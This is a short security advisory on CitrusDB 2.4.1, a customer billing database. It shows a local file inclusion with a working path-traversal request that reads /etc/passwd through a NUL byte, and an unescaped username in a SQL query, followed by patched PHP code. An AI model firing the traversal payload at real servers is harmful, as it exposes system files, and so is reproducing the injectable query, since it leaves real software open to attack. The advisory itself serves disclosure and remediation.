CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Author: Michal `wacky` Blaszczak
WWW: blaszczakm.blogspot.com


CitrusDB is an open source customer service and billing database.
It can be used by customer service personnel to provide sales and support to customers,
and by billing staff to bill customers for their services via invoices and credit card batches.
Customers may access the online customer account manager to view their services and billing history,
and to make service and support requests online.

1) LFI (Local File Inclusion)

The `load` parameter is used to build an include path without any validation:

http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base

index.php:315

// $load comes straight from the request; "../" is not stripped and the
// ".php" suffix can be cut off by a NUL byte on PHP versions before 5.3.4,
// which is why the file_exists() check above the include does not help.
$filepath = "$path_to_citrus/$load.php";
if (file_exists($filepath)) {
    include('./'.$load.'.php');
}


2) SQL INJECTION

The username is interpolated directly into the query string instead of being passed as a bound parameter:

include/user.class.php:134

// $user_name is user-controlled and is placed inside the quoted literal
// unescaped, so a single quote in the value terminates the string.
$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";
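As an added example (not CitrusDB code), the two vulnerable lines above can be replaced with an allowlisted, realpath-checked include and a prepared statement. The function names, the module allowlist and the mysqli handle are assumptions for illustration.

```php
<?php
// Added example, not CitrusDB code. $path_to_citrus and $db are assumed to
// exist as in the application; the allowlist contents are illustrative.

// 1) LFI fix: accept only known module names, then confirm the resolved
//    path still lies inside the application directory.
function load_module(string $path_to_citrus, string $load): void
{
    // Hypothetical allowlist; the real module names would come from the app.
    $allowed = ['base', 'customer', 'billing', 'invoice'];
    if (!in_array($load, $allowed, true)) {
        http_response_code(400);
        exit('unknown module');
    }
    $basedir  = realpath($path_to_citrus);
    $filepath = realpath("$path_to_citrus/$load.php");
    // realpath() returns false for a missing file and resolves "..", so a
    // path that escapes $path_to_citrus (or contains a NUL) is rejected here.
    if ($basedir === false || $filepath === false
        || strncmp($filepath, $basedir . DIRECTORY_SEPARATOR, strlen($basedir) + 1) !== 0) {
        http_response_code(400);
        exit('invalid module path');
    }
    include $filepath;
}

// 2) SQLi fix: bind $user_name as a parameter instead of interpolating it,
//    so quotes in the value are data, not SQL syntax.
function fetch_password_hash(mysqli $db, string $user_name): ?string
{
    $stmt = $db->prepare('SELECT password FROM user WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $user_name);
    $stmt->execute();
    $stmt->bind_result($password);
    $hash = $stmt->fetch() ? $password : null;
    $stmt->close();
    return $hash;
}

// Usage in index.php would become:
//   load_module($path_to_citrus, (string)($_GET['load'] ?? 'base'));
```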
